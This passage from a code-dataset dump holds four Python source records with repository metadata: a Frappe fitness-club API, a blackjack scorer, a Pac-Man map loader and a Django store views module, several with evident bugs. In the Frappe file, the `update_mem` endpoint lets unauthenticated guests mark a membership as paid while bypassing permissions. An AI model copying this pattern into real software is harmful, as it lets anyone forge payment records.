frappe.get_doc('Client Sessions', client_session.name)\n sessions.append({\n 'package_name': client_session_doc.package_name,\n 'expiry_date' : client_session_doc.expiry_date,\n 'used_sessions': client_session_doc.used_sessions,\n 'remaining_sessions': client_session_doc.remaining_sessions\n })\n\n details=[]\n pt_list = frappe.get_all('Fitness Training Appointment', filters={'client_id':client.name}, fields=['name','start_time'], order_by=\"appointment_date asc\")\n if pt_list:\n for pt in pt_list:\n pt_doc = frappe.get_doc('Fitness Training Appointment', pt.name)\n cancel_time = pt_doc.start_time - timedelta(seconds=int(time.pt_cancellation_time))\n start_date = pt_doc.start_time.date()\n\n rating_list = frappe.get_all('Rating', filters={'document_id':pt.name}, fields=['rating_point'])\n if rating_list:\n for rating in rating_list:\n rating_point = rating.rating_point\n details.append({\n \"name\": pt_doc.name,\n \"date\": start_date,\n \"client_id\" : pt_doc.client_id,\n \"client_name\": pt_doc.client_name,\n \"package_name\": pt_doc.fitness_service,\n \"trainer_name\": pt_doc.service_staff,\n \"status\": pt_doc.appointment_status,\n \"start_time\": pt_doc.start_time,\n \"end_time\": pt_doc.end_time,\n \"payment_status\": pt_doc.payment_status,\n \"cancellation_time\" : cancel_time,\n \"rating\": rating_point\n })\n\n frappe.response[\"message\"] = {\n \"disabled\": disabled,\n \"pt_appointments\": details,\n \"packages\": sessions\n }\n\n@frappe.whitelist()\ndef get_appointments(client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n doc = frappe.get_all('Fitness Training Appointment', filters={'client_id':client.name}, fields=['name','booking_date','client_id','client_name','fitness_service','service_staff','appointment_status','start_time','end_time','payment_status'], order_by=\"appointment_date asc\")\n details=[]\n if doc:\n for rating in doc:\n # start_time = datetime.strftime(rating.start_time, \"%H:%M:%S\")\n # end_time = datetime.strftime(rating.end_time, \"%H:%M:%S\")\n start_date = rating.start_time.date()\n\n rate=frappe.get_all('Rating', filters={'document_id':rating.name}, fields=['rating_point'])\n #cancel_time = rating.start_time - timedelta(seconds=int(time.spa_cancel_time))\n if rate:\n rate=rate[0]\n details.append({\n 'pt_appointment': {\n \"name\": rating.name,\n \"date\": start_date,\n \"client_id\" : rating.client_id,\n \"client_name\": rating.client_name,\n \"package_name\": rating.fitness_service,\n \"trainer_name\": rating.service_staff,\n \"status\": rating.appointment_status,\n \"start_time\": rating.start_time,\n \"end_time\": rating.end_time,\n \"payment_status\": rating.payment_status\n },\n 'Rating': rate.rating_point,\n })\n else:\n details.append({\n 'pt_appointment': {\n \"name\": rating.name,\n \"date\": start_date,\n \"client_id\" : rating.client_id,\n \"client_name\": rating.client_name,\n \"package_name\": rating.fitness_service,\n \"trainer_name\": rating.service_staff,\n \"status\": rating.appointment_status,\n \"start_time\": rating.start_time,\n \"end_time\": rating.end_time,\n \"payment_status\": rating.payment_status\n },\n 'Rating': -1,\n })\n return details\n\n@frappe.whitelist()\ndef cancel_request(doc_id):\n doc = frappe.get_doc('Fitness Training Request', doc_id)\n frappe.db.set_value('Fitness Training Request', doc_id, {\n 'request_status': 'Cancelled',\n 'docstatus': 2\n })\n doc.reload()\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"status_message\": \"Fitness Training Request has been cancelled\"\n }\n # else:\n # frappe.response[\"message\"] = {\n # \"status\": 0,\n # \"status_message\": \"Fitness Training Appointmnent already cancelled\"\n # }\n\n@frappe.whitelist()\ndef cancel_session(appointment_id):\n doc = cancel_appointment_online(appointment_id)\n if doc == 1:\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"status_message\": \"Fitness Training Appointment has been cancelled\"\n }\n else:\n frappe.response[\"message\"] = {\n \"status\": 0,\n \"status_message\": \"Fitness Training Appointment already cancelled\"\n }\n\n@frappe.whitelist()\ndef proceed_payment(client_id,doc_id, payment_method):\n doc = frappe.get_doc('Fitness Training Request', doc_id)\n # doc.payment_method= payment_method\n # doc.save()\n # cart = add_cart_from_pt_online(doc.client_id, doc.name)\n wallet= get_balance()\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"document_name\": doc.name,\n \"wallet_balance\": wallet\n }\n\n@frappe.whitelist(allow_guest=True)\ndef update_mem(doc_id):\n doc = frappe.get_doc(\"Memberships Application\", doc_id)\n doc.append('membership_payment', {\n \"mode_of_payment\": \"Online Payment\",\n \"paid_amount\": doc.grand_total\n\t\t})\n doc.save(ignore_permissions=True)", "repo_name": "VivekChamp/clubcrm", "sub_path": "club_crm/api/app/fitness.py", "file_name": "fitness.py", "file_ext": "py", "file_size_in_byte": 11512, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "frappe.db.get", "line_number": 12, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 12, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 12, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 14, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 18, "usage_type": "attribute"}, {"api_name": "frappe.get_list", "line_number": 24, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 26, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 37, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 44, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 50, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 10, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 57, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 58, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 61, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 78, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 55, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 84, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 84, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 84, "usage_type": "attribute"}, {"api_name": "frappe.get_doc", "line_number": 85, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 87, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 90, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 82, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 113, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 113, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 113, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 116, "usage_type": "name"}, {"api_name": "frappe.get_doc", "line_number": 116, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 119, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 122, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 131, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 134, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 135, "usage_type": "call"}, {"api_name": "datetime.time.pt_cancellation_time", "line_number": 135, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 135, "usage_type": "name"}, {"api_name": "frappe.get_all", "line_number": 138, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 157, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 109, "usage_type": "call"}, {"api_name": "frappe.db.get", "line_number": 165, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 165, "usage_type": "attribute"}, {"api_name": "frappe.session", "line_number": 165, "usage_type": "attribute"}, {"api_name": "frappe.get_all", "line_number": 166, "usage_type": "call"}, {"api_name": "frappe.get_all", "line_number": 174, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 163, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 213, "usage_type": "call"}, {"api_name": "frappe.db.set_value", "line_number": 214, "usage_type": "call"}, {"api_name": "frappe.db", "line_number": 214, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 219, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 211, "usage_type": "call"}, {"api_name": "club_crm.club_crm.doctype.fitness_training_appointment.fitness_training_appointment.cancel_appointment_online", "line_number": 231, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 233, "usage_type": "attribute"}, {"api_name": "frappe.response", "line_number": 238, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 229, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 245, "usage_type": "call"}, {"api_name": "club_crm.api.wallet.get_balance", "line_number": 249, "usage_type": "call"}, {"api_name": "frappe.response", "line_number": 250, "usage_type": "attribute"}, {"api_name": "frappe.whitelist", "line_number": 243, "usage_type": "call"}, {"api_name": "frappe.get_doc", "line_number": 258, "usage_type": "call"}, {"api_name": "frappe.whitelist", "line_number": 256, "usage_type": "call"}]}
+{"seq_id": "31975321226", "text": "from functools import reduce\n\ndef aces_value(aces, non_aces_total):\n if len(aces) == 0:\n return 0\n missing = 21 - non_aces_total\n with_11 = 11 + len(aces)-1\n without_11 = len(aces)\n if with_11 <= missing:\n return with_11\n else:\n return without_11\n\ndef card_value(card):\n if \"Q\" == card or \"J\" == card or \"K\" == card:\n return 10\n else:\n return int(card)\n\ndef value(hand):\n count = len(hand)\n aces = filter(lambda x: x == \"A\", hand)\n non_aces = filter(lambda x: x != \"A\", hand)\n non_aces_value = map(lambda x: card_value(x), non_aces)\n non_aces_total = reduce(lambda x,y: x+y, non_aces_value, 0)\n aces_total = aces_value(list(aces), non_aces_total)\n return non_aces_total + aces_total\nprint(value([\"2\",\"2\", \"3\"]))\nprint(value([\"A\", \"A\"]))\ntwenty_one_aces = [\"A\"] * 21\nprint(value(twenty_one_aces))\n\n", "repo_name": "rafaelri/coding-challenge-solutions", "sub_path": "python/blackjack/blackjack.py", "file_name": "blackjack.py", "file_ext": "py", "file_size_in_byte": 877, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "functools.reduce", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "28718791023", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Build Preliminaries of PacMan Game\"\"\"\n\nimport logging\n\n# Set logging\nlogging.basicConfig(level=logging.ERROR, filemode='w')\n\n\ndef load_map(file_pathname):\n \"\"\"Load Pac-Man Map\n\n Arguments:\n file_pathname {str} -- the file path name of a Pac-Man map\n\n Raises:\n FileNotFoundError: Provided file path name is not found\n IOError: Provided file path name can not accessible by read mode\n\n Returns:\n list -- A list of lines of Pac-Man Map\n \"\"\"\n if not isinstance(file_pathname, str):\n raise TypeError(\"Your file path must be a string\")\n try:\n # Open the file back and read the contents\n with open(file_pathname, \"r\") as map_file:\n contents = map_file.read().splitlines()\n # Check if the file or directory at `path` can be found\n except FileNotFoundError:\n raise FileNotFoundError(\"File does not exist\")\n # Check if the file or directory at `path` can be accessed by the program\n except IOError:\n raise IOError(\"File is not accessible\")\n # Returns a list of line\n return contents\n\n\ndef main():\n \"\"\"Demonstrate and run test\"\"\"\n file_pathname = './map/level1.amap'\n\n # Test wp01\n pacman_map = load_map(file_pathname)\n for line in pacman_map:\n print(line)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "kang-de-conqueror/pac_man", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 8, "usage_type": "attribute"}]}
+{"seq_id": "19222687482", "text": "import random\nfrom decimal import Decimal\nfrom django.forms.models import model_to_dict\n\nfrom django.db.models import Q\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import JsonResponse, HttpResponse, HttpResponseRedirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.text import slugify\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core import serializers\n\n\nfrom .models import Category, Product, ProductType, ProductSpecificationValue, Comments\nfrom .forms import AddToCartForm, AddCategoryForm, ColorSearchForm\n\nfrom apps.cart.cart import Cart\nfrom apps.vendor.forms import ProductForm, VendorRegistrationForm, VendorEditForm\nfrom apps.communication.forms import NewCommentForm\nfrom apps.vendor.models import Follow\n\n\ndef show_category(request,hierarchy= None):\n category_slug = hierarchy.split('/')\n parent = None\n root = Category.objects.all()\n for slug in category_slug[:-1]:\n parent = root.get(parent=parent, slug = slug)\n instance = Category.objects.get(parent=parent,slug=category_slug[-1])\n product = Product.objects.filter(\n category__in=Category.objects.filter(name=instance.name).get_descendants(include_self=True))\n brands = ProductType.objects.all()\n return render(request, 'product/search.html', {'product_search': product, 'product_search_query': instance\n , 'brands':brands})\n\ndef parent_child_check(request):\n if request.POST.get('mainAction') == 'post':\n id = request.POST.get('category_id')\n categories = Category.objects.filter(level=0)\n for i in categories:\n categories = Category.objects.get(id=i.id).get_descendants(include_self=True)\n response = JsonResponse({'categories': \"rr\"})\n return response\n\ndef product_all(request):\n products = Product.objects.prefetch_related(\"product_image\").filter(is_active=True)\n return render(request, \"store/product_all.html\", {\"products\": products})\n\ndef search(request):\n query = request.GET.get('query', '')\n product = Product.objects.filter(Q(title__icontains=query) | Q(description__icontains=query))\n brands = ProductType.objects.all()\n\n return render(request, 'product/search.html', {'product_search': product, 'product_search_query': query\n , 'brands':brands, 'color_input':ColorSearchForm})\n\ndef filter_page(request):\n if request.method == \"GET\":\n query = request.GET.get('query', '')\n query = query.split(',')\n discount_percent = []\n user_chose_spec = False\n \"\"\"sizes = ['S','M','L','X','XL','XXL','Red','Blue','White','Black',\n 'Brown','Green','Yellow','Purple','Orange','Cream','Lemon']\"\"\"\n for i in query:\n if i == '< 10%':\n for num in range(1,10):\n discount_percent.append(num)\n if i == '< 20%':\n for num in range(11,21):\n discount_percent.append(num)\n if i == '< 30%':\n for num in range(21,31):\n discount_percent.append(num)\n if i == '< 40%':\n for num in range(31,41):\n discount_percent.append(num)\n if i == '< 50%':\n for num in range(41,51):\n discount_percent.append(num)\n if i == '< 60%':\n for num in range(51,61):\n discount_percent.append(num)\n\n brands = ProductType.objects.all()\n\n name_list = []\n for i in query:\n instance = Category.objects.filter(slug=i)\n if instance:\n for all in instance:\n name_list.append(all.name)\n if 'has_category' in query and \"has_brand\" in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent, product_type__name__in=query,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif 'has_category' in query and \"has_brand\" in query:\n product = Product.objects.filter(Q(product_type__name__in=query,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif 'has_category' in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent,\n category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif \"has_brand\" in query and \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent, product_type__name__in=query))\n elif 'has_category' in query:\n product = Product.objects.filter(Q(category__in=Category.objects.filter(name__in=name_list).get_descendants(include_self=True)))\n elif \"has_brand\" in query:\n product = Product.objects.filter(Q(product_type__name__in=query))\n elif \"has_discount\" in query:\n product = Product.objects.filter(Q(discount_percent__in=discount_percent))\n\n if ('has_size' in query or 'has_color' in query):\n spec_list=[]\n if ('has_category' in query or \"has_brand\" in query or \"has_discount\" in query) and \\\n ('has_size' in query or 'has_color' in query):\n specification = ProductSpecificationValue.objects.filter(Q(product__in=product, value__in=query))\n for spec in specification:\n spec_list.append(spec.product.id)\n\n if ('has_category' not in query and \"has_brand\" not in query and \"has_discount\" not in query) and \\\n ('has_size' in query or 'has_color' in query):\n specification = ProductSpecificationValue.objects.filter(Q(value__in=query))\n for spec in specification:\n spec_list.append(spec.product.id)\n product = Product.objects.filter(Q(id__in=spec_list))\n if ('has_category' in query):\n query.remove('has_category')\n if (\"has_brand\" in query):\n query.remove(\"has_brand\")\n if (\"has_discount\" in query):\n query.remove(\"has_discount\")\n if ('has_size' in query):\n query.remove('has_size')\n if ('has_color' in query):\n query.remove('has_color')\n\n return render(request, 'product/filter_page.html', {'product_search': product, 'product_search_query': query\n , 'brands':brands, 'user_chose_spec':user_chose_spec})\n\ndef search_brand(request):\n if request.GET.get('action') == 'get':\n brands = request.GET.get('brands')\n brands = ProductType.objects.filter(name__iexact=brands)\n\n item = {}\n if brands:\n serialized_queryset = serializers.serialize('python', brands)\n item['table'] = serialized_queryset\n\n response = JsonResponse({'item': item})\n return response\n\nfrom django import template\nregister = template.Library()\n\n\n#@register.simple_tag(takes_context=True)\n@register.filter(is_safe=True)\ndef search_single(request):\n if request.method == \"GET\":\n query = request.GET.get('query', '')\n product_search = Product.objects.filter(Q(title__icontains=query) |\n Q(description__icontains=query) | Q(id__icontains=query))\n brands = ProductType.objects.all()\n\n response = JsonResponse({'product_search': list(product_search)})\n return response\n\ndef search_single2(request):\n if request.GET.get('action') == 'get':\n query = request.GET.get('productID')\n product_search = Product.objects.filter(Q(title__icontains=query) |\n Q(description__icontains=query) | Q(id__icontains=query)).values()\n brands = ProductType.objects.all()\n product = \"\"\"\n \n {% for i in product_search %}\n
\n \n {% for image in i.product_images.all %}\n {% if image.is_main %}\n
\n
10% \n
\n
\n
{{i.description}} \n NGstoreboy Price Now \n {{i.price}} \n {{i.discount_price}} \n ADD TO CART \n \n {% endif %}\n {% endfor %}\n
\n \n {% endfor %}\n
\"\"\"\n response = JsonResponse({'product_search': list(product)})\n return response\ndef product_detail(request, category_slugz, product_slugz):\n cart = Cart(request)\n products = get_object_or_404(Product, category__slug=category_slugz, slug=product_slugz, is_active=True)\n stores_user_follow=[]\n for i in products.vendor.vendor_follower.all():\n stores_user_follow.append(i.follower)\n\n wishlist = products.users_wishlist.all().count()\n likes = products.likes.all().count()\n product_id = str(products.id)\n wishlist_boolean = False\n like_boolean = False\n product_spec = ProductSpecificationValue.objects.filter(product=products)\n\n #------------------------------------------------------\n allcomments = products.comments.all()\n page = request.GET.get('page', 1)\n\n paginator = Paginator(allcomments, 10)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n if products.users_wishlist.filter(id=request.user.id).exists():\n wishlist_boolean=True\n if products.likes.filter(id=request.user.id).exists():\n like_boolean=True\n if request.method == 'POST':\n comment_form = NewCommentForm(request.POST)\n if comment_form.is_valid():\n user_comment = comment_form.save(commit=False)\n user_comment.post = products\n user_comment.save()\n return HttpResponseRedirect('/' + products.slug)\n\n return redirect('product_:product_detail_', category_slug= category_slugz, product_slug=product_slugz)\n else:\n comment_form = NewCommentForm()\n form = AddToCartForm()\n\n #----------------------------------------------------\n similar_products = list(products.category.product_category.exclude(id=products.id))\n if len(similar_products) >= 4:\n similar_products = random.sample(similar_products, 4)\n\n #-------------------------------------------------\n breadcrumbs_link = products.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n return render(request, 'product/product.html', {'comment_form': comment_form, 'product': products, 'product_id': product_id,\n 'wishlist': str(wishlist), 'wishlist_boolean':wishlist_boolean,\n 'likes': str(likes), 'like_boolean':like_boolean, 'allcomments':allcomments, 'comments':comments,\n 'product_spec':product_spec, 'stores_user_follow':stores_user_follow, 'breadcrumbs': breadcrumbs})\n\n\ndef make_comment(request):\n cart = Cart(request)\n if request.POST.get('action') == 'post':\n name = request.POST.get('name')\n email = request.POST.get('email')\n comment = request.POST.get('comment')\n product_id = request.POST.get('product_id')\n products = Product.objects.get_object_or_404get(id=product_id)\n wishlist = products.users_wishlist.all().count()\n likes = products.likes.all().count()\n product_id = str(products.id)\n wishlist_boolean = False\n like_boolean = False\n product_spec = ProductSpecificationValue.objects.filter(product=products)\n\n # ------------------------------------------------------\n if request.user.is_authenticated:\n Comments.objects.create(made_by=request.user,\n name=request.user.firstname + \" \" + request.user.surname,\n email=request.user.email, default_image=request.user.user_image,\n made_on=products, parent=None, content=comment)\n else:\n if not request.user.is_authenticated and name != \"\" and email != \"\":\n Comments.objects.create(made_by=None, name=name, email=request.user.email,\n made_on=products, parent=None, content=comment)\n else:\n error = \"e no follo\"\n\n response = JsonResponse({'comments': error})\n return response\n\n allcomments = products.comments.all()\n page = request.GET.get('page', 1)\n\n paginator = Paginator(allcomments, 10)\n try:\n comments = paginator.page(page)\n except PageNotAnInteger:\n comments = paginator.page(1)\n except EmptyPage:\n comments = paginator.page(paginator.num_pages)\n\n if products.users_wishlist.filter(id=request.user.id).exists():\n wishlist_boolean = True\n if products.likes.filter(id=request.user.id).exists():\n like_boolean = True\n\n # ----------------------------------------------------\n similar_products = list(products.category.product_category.exclude(id=products.id))\n if len(similar_products) >= 4:\n similar_products = random.sample(similar_products, 4)\n\n # -------------------------------------------------\n breadcrumbs_link = products.get_cat_list()\n category_name = [' '.join(i.split('/')[-1].split('-')) for i in breadcrumbs_link]\n breadcrumbs = zip(breadcrumbs_link, category_name)\n\n\n comment_form = NewCommentForm()\n form = AddToCartForm()\n\n return render(request, 'product/product.html',\n {'comment_form': comment_form, 'product': products, 'product_id': product_id,\n 'wishlist': str(wishlist), 'wishlist_boolean': wishlist_boolean,\n 'likes': str(likes), 'like_boolean': like_boolean, 'allcomments': allcomments,\n 'comments': comments,\n 'product_spec': product_spec, 'breadcrumbs': breadcrumbs})\n\n\ndef product_detail2(request):\n cart = Cart(request)\n if request.POST.get('action') == 'post':\n qtyAction = request.POST.get('qtyAction')\n productID = int(request.POST.get('productID'))\n productQTY = int(request.POST.get('productQTY'))\n if qtyAction == 'include_item':\n product = get_object_or_404(Product, id=productID)\n cart.add(product_id=productID, product=product, quantity=productQTY, update_quantity=False)\n messages.success(request, 'The account was successfully added to the account')\n response = JsonResponse(\n {'cart_length': cart.__len__()})\n return response\n\n@login_required\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = AddCategoryForm(request.POST)\n if form.is_valid():\n vendor = form.save(commit=False)\n title = form.cleaned_data['title']\n slug = form.cleaned_data['slug']\n Category.objects.create(title=title, slug=slug, ordering='1')\n else:\n form=AddCategoryForm()\n return render(request,'product/add_category.html', {'form':form})\n else:\n return redirect('core_:frontpage')\n\ndef category_list(request, category_slug):\n category = get_object_or_404(Category, slug=category_slug)\n return render(request, 'product/category.html', {'category_in_product_view': category})\n\ndef vendor_category(request):\n if request.GET.get('mainAction') == 'post':\n category_slug = request.GET.get('category_slug')\n category = get_object_or_404(Category, slug=category_slug)\n product = Product.objects.filter(\n Product, category__in=Category.objects.get(name=category_slug).get_descendants(include_self=True)\n )\n response = JsonResponse({'product': product})\n return response\n\n@login_required\ndef likes_add_and_remove(request, id):\n if request.GET.get('action') == 'get':\n product = get_object_or_404(Product, id=id)\n if product.likes.filter(id=request.user.id).exists():\n product.likes.remove(request.user)\n product_exist = True\n action_text=' like '\n else:\n product.likes.add(request.user)\n product_exist = False\n action_text=' unlike '\n likes = product.likes.all().count()\n response = JsonResponse({'likes_no': str(likes), 'action_text':action_text, 'product_exist':product_exist})\n return response\n\n@login_required\ndef remove_from_likes(request):\n if request.GET.get('action') == 'get':\n id = request.GET.get('productID')\n product = get_object_or_404(Product, id=id)\n product_count=product.likes.add(request.user).count()\n if product.likes.filter(id=request.user.id).exists():\n product.likes.remove(request.user)\n messages.success(request, \"you have unliked \" + product.title)\n response = JsonResponse({'product_count':product_count})\n return response\n\n@login_required\ndef add_product(request):\n vendor = request.user.which_vendor\n if request.method == \"POST\":\n form = ProductForm(request.POST, request.FILES)\n if form.is_valid():\n product = form.save(commit=False)\n\n product.vendor = vendor\n product.title = product.title\n product.category = product.category\n product.slug = slugify(product.title)\n product.description = product.description\n product.price = Decimal(product.price)\n product.in_stock = True\n product.is_active = True\n product.save()\n return redirect('vendor_:vendor_admin_')\n else:\n form=ProductForm()\n return render(request,'vendor/add_product.html', {'form':form})\n\n@login_required\ndef add_category(request):\n if request.user.is_superuser:\n if request.method == \"POST\":\n form = AddCategoryForm(request.POST)\n if form.is_valid():\n vendor = form.save(commit=False)\n title = vendor.cleaned_data['title']\n slug = vendor.cleaned_data['slug']\n Category.objects.create(title=title, slug=slug, ordering='1')\n else:\n form=AddCategoryForm()\n return render(request,'product/add_category.html', {'form':form})\n else:\n return redirect('core_:frontpage')\n", "repo_name": "Pycobra/NgStore2", "sub_path": "apps/product/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 19849, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "models.Category.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 27, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 30, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 31, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 31, "usage_type": "name"}, {"api_name": "models.Category.objects.filter", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 32, "usage_type": "name"}, {"api_name": "models.ProductType.objects.all", "line_number": 33, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 33, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 40, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 42, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 42, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 43, "usage_type": "call"}, {"api_name": "models.Product.objects.prefetch_related", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 52, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 53, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 53, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 53, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "forms.ColorSearchForm", "line_number": 56, "usage_type": "name"}, {"api_name": "models.ProductType.objects.all", "line_number": 86, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 86, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 86, "usage_type": "name"}, {"api_name": "models.Category.objects.filter", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 90, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 95, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 95, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 96, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 98, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 98, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 99, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 101, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 101, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 101, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 102, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 102, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 102, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 104, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 106, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Category.objects.filter", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 106, "usage_type": "attribute"}, {"api_name": 